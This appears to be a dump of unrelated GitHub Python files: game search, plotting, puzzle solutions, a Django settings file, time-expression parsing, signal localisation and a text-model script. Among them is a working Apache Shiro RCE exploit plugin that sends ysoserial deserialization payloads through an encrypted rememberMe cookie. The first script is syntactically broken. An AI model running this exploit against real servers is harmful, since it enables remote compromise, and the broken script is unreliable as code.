"MIT"
] | permissive | dhanraj-vedanth/IaaS_VPC_CDN | f5a8a7c26ec8eb77593c7b3f7b7372972205b1cb | 262dbc7db63d5e76398dadc8015256fb37986e36 | refs/heads/main | 2022-12-31T23:05:47.073903 | 2020-10-17T04:08:20 | 2020-10-17T04:08:20 | 304,781,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 904 | py | import json
import paramiko
import sys
import ipaddress
import re
import os
Content = sys.argv[1]
my_DNS = sys.argv[2]
#Hyp_var="H2"
#Content="rfc_9"
def Edge_Server():
with open("/home/root/DNS_mappings.txt") as f:
y = json.loads(f.read())
#print(y["RFC_9"])
f1=0
for key,value in y.items():
if(key==Content):
f1=1
if(f1==0):
print("File not published")
os._exit(0)
Edge_Servers = y[Content] #Input the logic of which RFC the customer wants to subscribe
if ele in Edge_Servers:
last_octet = ele.split(.)[-1]
if int(last_octet)%2==1 and my_DNS=='10.0.0.254':
Edge_IP_final=ele
if int(last_octet)%2==1 and my_DNS=='11.0.0.254'
Edge_IP_final=ele
return(Edge_IP_final)
def get_Edge_IP():
Edge_IP=Edge_Server()
return(Edge_IP)
get_Edge_IP()
| [
"draghun@ncsu.edu"
] | draghun@ncsu.edu |
f023fd747610af991ae9a15b3121ebbb3aed6e8c | 36ca66f4b42a430445c568e558ea58dffe1d5311 | /src/helpers/alphaBeta.py | 70cef9494b34c1ea1a6755afdf1526dd4636f297 | [] | no_license | cameliapatilea/Obstruction | 7d75ab2911d774d605ee6cd424a2968057a209b7 | 1b652092c8f173e954bbe56438c46c8c759c06cf | refs/heads/master | 2022-06-09T04:57:55.592374 | 2020-05-03T18:38:42 | 2020-05-03T18:38:42 | 257,021,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,015 | py | from helpers.joc import *
# functie ce primeste ca parametru intervalul alpha-beta(capetele intervalului) si obiectul de tip Stare pe care se calculeaza
def alpha_beta(alpha, beta, stare):
# daca am ajuns pe o frunza sau pe tabla nu mai pot fi puse simboluri, inseamna ca tabla este completa si trebuie sa oprim jocul
if stare.adancime == 0 or stare.tabla_joc.verifica_tabla() is False:
# a doua euristica
stare.scor = stare.tabla_joc.estimeaza_scor2(stare.adancime)
#prima euristica
# stare.scor = stare.tabla_joc.estimeaza_scor(stare.adancime)
return stare
if alpha > beta:
return stare # este intr-un interval invalid deci nu o mai procesez
# obtinu lista de mutari posibile generata in clasa Stare
stare.mutari_posibile = stare.mutari_stare()
# daca ma aflu pe jucatorul introdus din consola, inseamna ca trebuie sa minimizez - JMIN
if stare.juc_curent == Joc.jucator:
scor_curent = float('-inf')
for mutare in stare.mutari_posibile:
# calculeaza scorul
stare_noua = alpha_beta(alpha, beta, mutare)
if (scor_curent < stare_noua.scor):
stare.stare_aleasa = stare_noua
scor_curent = stare_noua.scor
if (alpha < stare_noua.scor):
alpha = stare_noua.scor
if alpha >= beta:
break
# daca nu sunt pe jucatorul "calculator", adica pe JMAX trebuie sa maximizez
elif stare.juc_curent != Joc.jucator:
scor_curent = float('inf')
for mutare in stare.mutari_posibile:
stare_noua = alpha_beta(alpha, beta, mutare)
if (scor_curent > stare_noua.scor):
stare.stare_aleasa = stare_noua
scor_curent = stare_noua.scor
if (beta > stare_noua.scor):
beta = stare_noua.scor
if alpha >= beta:
break
stare.scor = stare.stare_aleasa.scor
return stare | [
"cami.patilea@gmail.com"
] | cami.patilea@gmail.com |
bea2f7dc4aaf162e5f9e13d362e2ce51dc1dc003 | 9a633645e5e2c02095c670f41789e72a06851145 | /graph.py | 0a597f8d666726172c86dfbd216db5c0068e44be | [
"MIT"
] | permissive | scimusmn/energy_tools | 558ac316ceb339a6a8ac9831be9ec846d6485b04 | ba9d26a823588e793f8c1ef4d79b9289ef32511e | refs/heads/master | 2016-08-07T20:36:27.258222 | 2013-12-09T15:39:54 | 2013-12-09T15:39:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,696 | py | """Graph CSV energy data
Usage:
graph.py <input_file>
graph.py (-h | --help)
graph.py --version
Options:
-h --help Show this help.
--version Show version number.
"""
from docopt import docopt
import csv
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import dateutil
def getColumn(filename, column):
o = open(filename, 'rU')
results = csv.reader(o)
print results
#results = csv.reader(open("data_2004-2013.csv"), delimiter="\t")
return [result[column] for result in results]
def make_graph(input_file):
reader = csv.reader(open(input_file, 'rU'))
date = []
buy = []
for _ in xrange(3):
next(reader)
for line in reader:
# Convert ISO datetime to Python date
python_datetime = dateutil.parser.parse(line[4])
# Convert Python datetime to MatPlotLib format
matplotlib_datetime = mdates.date2num(python_datetime)
# Add date and values to graph data set
date.append(matplotlib_datetime)
buy.append(line[5])
# Create figure and line subplots
fig, ax = plt.subplots()
ax.plot(date, buy)
# Format ticks at every year
years = mdates.YearLocator()
ax.xaxis.set_major_locator(years)
# Format the tick labels
yearsFmt = mdates.DateFormatter('%Y')
ax.xaxis.set_major_formatter(yearsFmt)
# Format the coords message box
ax.format_xdata = mdates.DateFormatter('%Y-%m-%dT%H:%M:%S')
# Format the X axis dates, by tilting, right aligning, and padding.
fig.autofmt_xdate()
plt.show()
if __name__ == "__main__":
args = docopt(__doc__, version='Graph 0.1')
make_graph(args['<input_file>'])
| [
"bkennedy@smm.org"
] | bkennedy@smm.org |
faa87c8e3f067bcd7755c759e47e022742482bb8 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /wbhjXmdbPSxCSE5hW_0.py | e9536e0fed2a7c9b48f0291977cccbacbce5b686 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,262 | py | """
A magic sigil is a glyph which represents a desire one wishes to manifest in
their lives. There are many ways to create a sigil, but the most common is to
write out a specific desire (e.g. " _I HAVE WONDERFUL FRIENDS WHO LOVE ME_ "),
remove all vowels, remove any duplicate letters (keeping the last occurence),
and then design a glyph from what remains.
Using the sentence above as an example, we would remove duplicate letters:
AUFRINDSWHLOVME
And then remove all vowels, leaving us with:
FRNDSWHLVM
Create a function that takes a string and removes its vowels and duplicate
letters. The returned string should not contain any spaces and be in
uppercase.
### Examples
sigilize("i am healthy") ➞ "MLTHY"
sigilize("I FOUND MY SOULMATE") ➞ "FNDYSLMT"
sigilize("I have a job I enjoy and it pays well") ➞ "HVBJNDTPYSWL"
### Notes
* For duplicate letters the **last one** is kept.
* When performing actual sigil magic, you **must** make your sigils **manually**.
* Check the **Resources** tab for more info on sigils if you're interested in the concept.
"""
def sigilize(desire):
a = ''.join(desire.upper().split())
b = sorted(set(a), key=a.rindex)
return ''.join(i for i in b if i not in "AEIOU")
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
23ac4abf067cb4bdc841275060af4632c5eb1301 | 6363796701067d429a2c8503bb27ae9427abc8ec | /Bioinformatics_Armory/ini.py | 3c0187bec23cd087043340933358fc0a2300528d | [] | no_license | ajiehust/rosalind | d6959603e78997f731a4fae9a9482b4327cb1d6f | c2a35f782e0251a2fbbe32462e4d8efbaa6b9083 | refs/heads/master | 2021-01-25T07:28:11.364093 | 2015-09-25T22:26:34 | 2015-09-25T22:26:34 | 41,969,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Problem Title: Introduction to the Bioinformatics Armory
Rosalind/Bioinformatics Armory
URL: http://rosalind.info/problems/ini/
solution by James Hu@Tue
'''
import sys
def main():
with open("ini") as f:
seq = f.readline().strip()
sys.stdout = open("ini.out","w")
print " ".join(map(str, [seq.count(x) for x in ['A','C','G','T']]))
if __name__ == '__main__':
main()
| [
"ajiehust@gmail.com"
] | ajiehust@gmail.com |
b9d27a322823a74e466788ce86d43eb3fa4cc1f7 | 686244a1cfd759521f8c0f216fd2f029eee8f758 | /Practice/Text_Visualization/bag_of_words_model.py | 10ae666412cbf8a3093e2f23fcf231ade9af43bc | [] | no_license | Amal-Krishna/Project | be0341b5ee1daa510d1751e8190f154d300491e8 | 0d70934b7cfaa5d255f55628461cce2802e6ab89 | refs/heads/master | 2022-01-07T05:22:46.095961 | 2019-04-29T13:55:52 | 2019-04-29T13:55:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,429 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 13 16:50:02 2019
@author: amalk
"""
import nltk
import re
import heapq
import numpy as np
text = """ Ishaan's scream drowned out the
stadium din on the TV. I had shifted up to a sofa from the floor.
`Huh?' I said. We were in Ishaan's house — Ishaan, Omi and I. Ishaan's mom
had brought in tea and khakra for us. 'It is more comfortable to snack on the
sofa. That is why I moved.'
`Tendulkar's gone. Fuck, now at this stage. Omi, don't you dare move now.
Nobody moves for the next five overs.'
I looked at the TV. We were chasing 283 to win. India's score a ball ago was
256-2 after forty-five overs. Twenty-seven runs in five overs, with eight wickets to
spare and Tendulkar on the crease. A cakewalk. The odds were still in India's
favour, but Tendulkar was out. And that explained the frowns on Ishaan's
forehead.
'The khakra's crispy,' Omi said. Ishaan glared at Omi, chiding him for his
shallow sensory pleasure in a moment of national grief. Omi and I kept our tea
cups aside and looked suitably mournful.
The crowd clapped as Tendulkar made his exit. Jadeja came to the crease and
added six more runs. End of forty-six overs, India 262/3. Twenty-one more runs
to win in four overs, with seven wickets in hand.
Over 46
'He made 122. The guy did his job. Just a few final closing shots left. Why are
you getting so worked up?' I asked during a commercial break. I reached for my
tea cup, but Ishaan signalled me to leave it alone. We were not going to indulge
until the fate of the match was decided. Ishaan was pissed with us anyway. The
match was in Vadodra, just two hours away from Ahmedabad. But we could not
go - one, because we didn't have money, and two, because I had my
correspondence exams in two days. Of course, I had wasted the whole day
watching the match on TV instead, so reason number two did not really hold
much weight.
'It is 5.25 runs required per over,' I said, not able to resist doing a
mathematical calculation. That is one reason I like cricket, there is so much
maths in it.
'You don't know this team. Tendulkar goes, they panic. It isn't about the
average. It is like the queen bee is dead, and the hive loses order,' Ishaan said.
Omi nodded, as he normally does to whatever Ishaan has to say about cricket.
'Anyway, I hope you realise, we didn't meet today to see this match. We have to
decide what Mr Ishaan is doing about his future, right?' I said.
Ishaan had always avoided this topic ever since he ran away from NDA a year
ago. His dad had already sarcastically commented, 'Cut a cake today to celebrate
one year of your uselessness.'
However, today I had a plan. I needed to sit them down to talk about our lives.
Of course, against cricket, life is second priority.
'Later,' Ishaan said, staring avidly at a pimple cream commercial.
'Later when Ishaan? I have an idea that works for all of us. We don't have a lot
of choice, do we?'
'All of us? Me, too?' Omi quizzed, already excited. Idiots like him love to be part
of something, anything. However, this time we needed Omi.
'Yes, you play a critical role Omi. But later when Ish? When?'
'Oh, stop it! Look, the match is starting. Ok, over dinner. Let's go to Gopi,' Ish
said.
'Gopi? Who's paying?' I was interrupted as the match began.
Beep, beep, beep. The horn of a car broke our conversation. A car zoomed
outside the pol.
'What the hell! I am going to teach this bastard a lesson,' Ish said, looking out
the window.
'What's up?'
'Bloody son of a rich dad. Comes and circles around our house everyday'
'Why?' I said.
'For Vidya. He used to be in coaching classes with her. She complained about
him there too,' Ish said.
Beep, beep, beep, the car came near the house again.
'Damn, I don't want to miss this match,' Ish said as he saw India hit a four. Ish
picked up his bat. We ran out the house. The silver Esteem circled the pol and
came back for another round of serenading. Ish stood in front of the car and
asked the boy to stop. The Esteem halted in front of Ish. Ish went to the driver,
an adolescent.
'Excuse me, your headlight is hanging out.'
'Really?' the boy said and shut off the ignition. He stepped outside and came to
the front.
Ish grabbed the boy's head from behind and smashed his face into the bonnet.
He proceeded to strike the headlight with his bat. The glass broke and the bulb
hung out.
'What's your problem,' the boy said, blood spurting out of his nose.
'You tell me what's up? You like pressing horns?' Ish said.
Ish grabbed his collar and gave six non-stop slaps across his face. Omi picked
up the bat and smashed the windscreen. The glass broke into a million pieces.
People on the street gathered around as there is nothing quite as entertaining as
a street fight.
The boy shivered in pain and fear. What would he tell his daddy about his
broken car and face?
Ish's dad heard the commotion and came out of the house. Ish held the boy in
an elbow lock. The boy was struggling to breathe.
'Leave him,' Ish's dad said.
Ish gripped him tighter.
'I said leave him,' Ish's dad shouted, 'what's going on here?'
'He has been troubling Vidya since last week,' Ish said. He kicked the boy's face
with his knee and released him. The boy kneeled on the floor and sucked in air.
The last kick from Ish had smeared the blood from his nose across his face.
'And what do you think you are doing?' Ish's dad asked him.
'Teaching him a lesson,' Ish said and unhooked his bat stuck in the
windscreen.
"""
#pre-processing
dataset = nltk.sent_tokenize(text)
for i in range(len(dataset)):
dataset[i] = dataset[i].lower()
dataset[i] = re.sub(r'\W',' ',dataset[i])
dataset[i] = re.sub(r'\s+',' ',dataset[i])
#creating the histogram
word2count = {}
for data in dataset:
words = nltk.word_tokenize(data)
for word in words:
if word not in word2count.keys():
word2count[word] = 1
else:
word2count[word] += 1
#creating most frequent word list
freq_words = heapq.nlargest(325,word2count,key=word2count.get)
#creating the BOW model
X = []
for data in dataset:
vector = []
for word in freq_words:
if word in nltk.word_tokenize(data):
vector.append(1)
else:
vector.append(0)
X.append(vector)
#creating a 2d array
X2 = np.asarray(X)
| [
"amalkrishna0736@gmail.com"
] | amalkrishna0736@gmail.com |
7147c94f8b19c8ebaae2f7bc177eb4455afe89db | cde752af8df0ae3007575778ccb0d43c4d5546aa | /eshop/settings.py | 401c6cb5fb4bb8f0a3f38d581bc5aee70508a640 | [] | no_license | Code-Institute-Submissions/django-eshop-project | e9f401fca16b4c56f07a66f01accea09999f208e | a6988c80077ca45c62e1753e420616bbc6dc4275 | refs/heads/master | 2022-12-03T19:41:59.428298 | 2020-08-15T14:13:25 | 2020-08-15T14:13:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,514 | py | """
Django settings for E-Shop project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('SECRET_KEY', '')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = 'DEVELOPMENT' in os.environ
ALLOWED_HOSTS = ['fullstack-project-eshop.herokuapp.com', 'localhost']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'allauth',
'allauth.account',
'allauth.socialaccount',
'home',
'products',
'bag',
'checkout',
'profiles',
# Other
'crispy_forms',
'storages',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'eshop.urls'
CRISPY_TEMPLATE_PACK = 'bootstrap4'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
os.path.join(BASE_DIR, 'templates', 'allauth'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request', # required by allauth
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
'bag.contexts.bag_contents',
],
'builtins': [
'crispy_forms.templatetags.crispy_forms_tags',
'crispy_forms.templatetags.crispy_forms_field',
]
},
},
]
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
AUTHENTICATION_BACKENDS = (
# Needed to login by username in Django admin, regardless of `allauth`
'django.contrib.auth.backends.ModelBackend',
# `allauth` specific authentication methods, such as login by e-mail
'allauth.account.auth_backends.AuthenticationBackend',
)
SITE_ID = 1
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
ACCOUNT_AUTHENTICATION_METHOD = 'username_email'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_SIGNUP_EMAIL_ENTER_TWICE = True
ACCOUNT_USERNAME_MIN_LENGTH = 4
LOGIN_URL = '/accounts/login/'
LOGIN_REDIRECT_URL = '/'
WSGI_APPLICATION = 'eshop.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
if 'DATABASE_URL' in os.environ:
DATABASES = {
'default': dj_database_url.parse(os.environ.get('DATABASE_URL'))
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-uk'
TIME_ZONE = 'GMT'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (os.path.join(BASE_DIR, 'static'),)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
if 'USE_AWS' in os.environ:
# Cache control
AWS_S3_OBJECT_PARAMETERS = {
'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',
'CacheControl': 'max-age=94608000',
}
# Bucket Config
AWS_STORAGE_BUCKET_NAME = 'fullstack-project-eshop'
AWS_S3_REGION_NAME = 'eu-west-2'
AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')
AWS_S3_CUSTOM_DOMAIN = f'{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com'
# Static and media files
STATICFILES_STORAGE = 'custom_storages.StaticStorage'
STATICFILES_LOCATION = 'static'
DEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'
MEDIAFILES_LOCATION = 'media'
# Override static and media URLs in production
STATIC_URL = f'https://{AWS_S3_CUSTOM_DOMAIN}/{STATICFILES_LOCATION}/'
MEDIA_URL = f'https://{AWS_S3_CUSTOM_DOMAIN}/{MEDIAFILES_LOCATION}/'
FREE_DELIVERY_THRESHOLD = 50
STANDARD_DELIVERY_PERCENTAGE = 10
# Stripe
FREE_DELIVERY_THRESHOLD = 50
STANDARD_DELIVERY_PERCENTAGE = 10
STRIPE_CURRENCY = 'gbp'
STRIPE_PUBLIC_KEY = os.getenv('STRIPE_PUBLIC_KEY', '')
STRIPE_SECRET_KEY = os.getenv('STRIPE_SECRET_KEY', '')
STRIPE_WH_SECRET = os.getenv('STRIPE_WH_SECRET', '')
if 'DEVELOPMENT' in os.environ:
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
DEFAULT_FROM_EMAIL = 'E-Shop@example.com'
else:
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASS')
DEFAULT_FROM_EMAIL = os.environ.get('EMAIL_HOST_USER')
| [
"jai.austin95@gmail.com"
] | jai.austin95@gmail.com |
e70cf9d6e63ff327f4103d60a0c7ba98634ec982 | 4d98abd2553e95856d835519424a60634fc4cdd3 | /CVE-2016-4437 Apache_Shiro_RCE/ShiroScan_1.2.4/moule/plugins/Spring2.py | 68bb19cf574477e3533d5a8f8ec6fe04827cd872 | [] | no_license | ANNS666/my_POC | 0157fa41bdd2d0f264e464b05bf9c75405083e44 | b3a38745609c9407a9bc0427f5dd55e4acfe6d70 | refs/heads/master | 2023-08-10T19:13:15.521562 | 2021-10-10T04:09:58 | 2021-10-10T04:09:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,658 | py | # -*- coding: utf-8 -*-
# By 斯文beast svenbeast.com
import os
import re
import base64
import uuid
import subprocess
import requests
import sys
import threadpool
from Crypto.Cipher import AES
from ..main import Idea
requests.packages.urllib3.disable_warnings()
JAR_FILE = 'moule/ysoserial.jar'
@Idea.plugin_register('Class26:Spring2')
class Spring2(object):
def process(self,url,command,resKey,func):
self.sendPayload(url,command,resKey)
def gcm_encode(self,resKey,file_body):
mode = AES.MODE_GCM
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(resKey), mode, iv)
ciphertext, tag = encryptor.encrypt_and_digest(file_body)
ciphertext = ciphertext + tag
payload = base64.b64encode(iv + ciphertext)
return payload
def cbc_encode(self,resKey,file_body):
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(resKey), mode, iv) #受key影响的encryptor
payload = base64.b64encode(iv + encryptor.encrypt(file_body))
return payload
def sendPayload(self,url,command,resKey,fp=JAR_FILE):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'Spring2', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ( (BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
file_body = pad(popen.stdout.read()) #受popen影响的file_body
payloadCBC = self.cbc_encode(resKey,file_body)
payloadGCM = self.gcm_encode(resKey,file_body)
header={
'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;'
}
try:
x = requests.post(url, headers=header, cookies={'rememberMe': payloadCBC.decode()+"="},verify=False, timeout=20) # 发送验证请求1
y = requests.post(url, headers=header, cookies={'rememberMe': payloadGCM.decode()+"="},verify=False, timeout=20) # 发送验证请求2
#print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode())
if(x.status_code==200):
print("[+] ****Spring2模块 key: {} 已成功发送! 状态码:{}".format(str(resKey),str(x.status_code)))
else:
print("[-] ****Spring2模块 key: {} 发送异常! 状态码:{}".format(str(resKey),str(x.status_code)))
except Exception as e:
print(e)
return False
| [
"m18479685120@163.com"
] | m18479685120@163.com |
b8fecdcd2f6db4c77f8c2dd91e69e1f8869ea920 | ff3da62ab2a336ba286ea320b8bf1eba5b1978ea | /normalization/time_Info/apm.py | e242dc16e93401a0d43eed4f9fa6c779d03c8403 | [] | no_license | llq20133100095/bert_ner_time | 9e17e9de77ff12b4ae5267986f646665066e070c | 9dc3baf5ca8f6d5cc7d4255bcfd913bd695c7b5e | refs/heads/master | 2021-10-28T14:59:17.217552 | 2019-04-24T06:12:22 | 2019-04-24T06:12:22 | 182,626,582 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,688 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/11/24 16:33
# @Author : honeyding
# @File : apm.py
# @Software: PyCharm
import re
class Apm:
apm_pat = re.compile(u'.*?(明早|傍晚|早上|早晨|凌晨|上午|中午|下午|大晚上|晚上|夜里|今晚|明晚|昨晚|前晚|这晚|晚|清晨|午后).*?')
apm_hour_pat = re.compile(u'.*?(明早|傍晚|早上|早晨|凌晨|上午|中午|下午|大晚上|晚上|夜里|今晚|明晚|昨晚|前晚|这晚|晚|清晨|午后).*?([0-9一二三四五六七八九两十]).*?')
def get_apm_info(self, entity, commonParser):
matcher = self.apm_pat.match(entity)
if matcher:
if commonParser:
commonParser.timeUnit[4] = True
return True
return False
def judge_apm_hour(self, entity, commonParser):
matcher = self.apm_hour_pat.match(entity)
if matcher:
if commonParser:
commonParser.timeUnit[4] = True
return True
return False
def adjustHours(self, entity, hour, commonParser):
if u"早" not in entity and u"上午" not in entity and u"晨" not in entity:
if u"中午" in entity:
if hour > 14 or hour > 2 and hour < 10:
print(u'不能是中午。')
commonParser.timeAPMInfo = str(hour) + u"点不能是中午。"
elif hour < 2 and hour > 0:
hour += 12
elif u"下午" not in entity and u"午后" not in entity:
if u"昨晚" in entity or u"明晚" in entity or u"傍晚" in entity or u"晚" in entity or u"晚上" in entity or u"夜里" in entity or u"今晚" in entity:
if hour > 12 and hour < 17 or hour >= 0 and hour < 5:
print(u'不能是晚上。')
commonParser.timeAPMInfo = str(hour) + u"点不能是晚上。"
elif hour >= 4 and hour <= 12:
hour += 12
else:
if hour > 0 and hour <= 12:
hour += 12
# if hour > 19 or hour < 1 or hour > 7 and hour < 12:
# print(u'不能是下午。')
# commonParser.timeAPMInfo = str(hour) + u'不能是下午。'
# elif hour > 0 and hour <= 7:
# hour += 12
elif hour > 12:
print(u'不能是上午或早上。')
commonParser.timeAPMInfo = str(hour) + u'点不能是上午或早上。'
return hour
if __name__ == '__main__':
apm_proc = Apm()
assert apm_proc.get_apm_info(u'早晨') is True | [
"1182953475@qq.com"
] | 1182953475@qq.com |
5110a5ba1daa96148516f99ba2b733b4c67c4cf7 | d3eb39fd54b8eaed104cee33da853b904b244344 | /src/Library/Python/pgl/signal.py | 470baf21b723762a532a8818ba5b017d865d382e | [] | no_license | MuffinSpawn/Dissertation | aab509c879752067cf799bd77abcf3cccf6eeff2 | 87047ecfbb41ab3dcde5db4c3c9768926afa27bb | refs/heads/master | 2021-01-25T13:06:08.733871 | 2018-03-02T05:16:27 | 2018-03-02T05:16:27 | 123,528,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,867 | py | import math
import numpy as np # NumPy (multidimensional arrays, linear algebra, ...)
import numpy.linalg as linalg
import scipy.signal as sig
import pgl.cluster as cluster
import pgl.curve as curve
import multiprocessing as mp
import matplotlib.pyplot as plt
# Compute the sum of the squared residuals between two equal-length signals.
def ssr(signal1, signal2):
ssr_sum = 0.0
for y1,y2 in zip(signal1,signal2):
ssr_sum += (y1-y2)**2
return ssr_sum
# Take two arrays of N sets of M signals, compute the total SSR for each pair
# of signal sets formed from the two arrays, and generate a matrix of all the
# total SSR values. This will, of course, be a symmetric matrix with zeros on
# the diagonal.
def ssr_matrix(signals1, signals2):
signals_shape = np.shape(signals1)
matrix = np.zeros((signals_shape[0], signals_shape[0]))
for i,ys_array1 in enumerate(signals1):
for j,ys_array2 in enumerate(signals2):
total = 0.0
for ys1,ys2 in zip(ys_array1,ys_array2):
total += ssr(ys1,ys2)
matrix[i,j] = total
matrix[j,i] = total
return matrix
def normalize(signals):
for i,signal in enumerate(signals):
peak = np.max(np.abs(signal))
signals[i] = signal / peak
return signals
def ac_contrib_index(mic_coordinates, test_coordinates,
thickness, i, j, n0, v1, v2, dt, settling_time):
#cs = np.array([1.67904751e+01,8.67724154e-01,-2.11743266e-02,2.14171568e-04])
delta_v = v2 - v1
velocity_scale_factory = delta_v / 10.0
#velocity_scale_factory = delta_v
# - Calculate the expected difference in TOA
xi = mic_coordinates[i,0]
yi = mic_coordinates[i,1]
dxi = xi-test_coordinates[0]
dyi = yi-test_coordinates[1]
di = math.sqrt(dxi*dxi+dyi*dyi+thickness*thickness)
#theta_i = math.acos(thickness/di)
#v_i = v1 + delta_v * math.sin(theta_i)
#wavelength_i = np.sum(np.array([cs[k]*di**k for k in range(4)]))
#ti = di / v1 + wavelength_i/4.0 + settling_time*i
v_i = v1 + velocity_scale_factory * di
ti = di / v_i + settling_time*i
xj = mic_coordinates[j,0]
yj = mic_coordinates[j,1]
dxj = xj-test_coordinates[0]
dyj = yj-test_coordinates[1]
dj = math.sqrt(dxj*dxj+dyj*dyj+thickness*thickness)
#theta_j = math.acos(thickness/dj)
#v_j = v1 + delta_v * math.sin(theta_j)
#wavelength_j = np.sum(np.array([cs[k]*dj**k for k in range(4)]))
#tj = dj / v1 + wavelength_j/4.0 + settling_time*i
v_j = v1 + velocity_scale_factory * dj
tj = dj / v_j + settling_time*j
tij = tj - ti
return int(round(n0 - tij / dt - 1))
def accumulated_correlation(signals, dt, mic_coordinates, radius, thickness,
v_s, v_p, grid_size=10, settling_time=0, octant=-1):
"""
Estimate the location of an acoustic event from multiple microphone signals
The Accumulated Correlation algorithm estimates the source location of a
signal that arrives at different times at multiple sensors. It starts by
calculating the cross-correlation for each pair of microphones signals. For
each test grid point, the expected time delay is calculated for each
microphone. Then for each unique signal pair the difference in the expected
time delay is used as an index into the cross correlation vectors. The
value in the cross correlation vector is added to a running sum for the
current test grid point. Finally, the test grid point with the largest sum
is taken as the most likely source location of the signal.
Parameters
----------
signals : numpy.ndarray
An array of time-domain signals
dt : scalar
The amount of time between each signal sample
coordinates: numpy.ndarray
An array of microphone coordinates (2D array with dimensions N x 2)
radius: scalar
The inner radius of the cavity
thickness: scaler
The thickness of the end plate of the cavity
v_p: scalar
The speed of sound in the cavity material
grid_size: int, optional
The number of vertical and horizontal test points (default 10)
settling_time: scalar
The time it takes for the DAQ digitizer to read one channel
Returns
-------
c : list
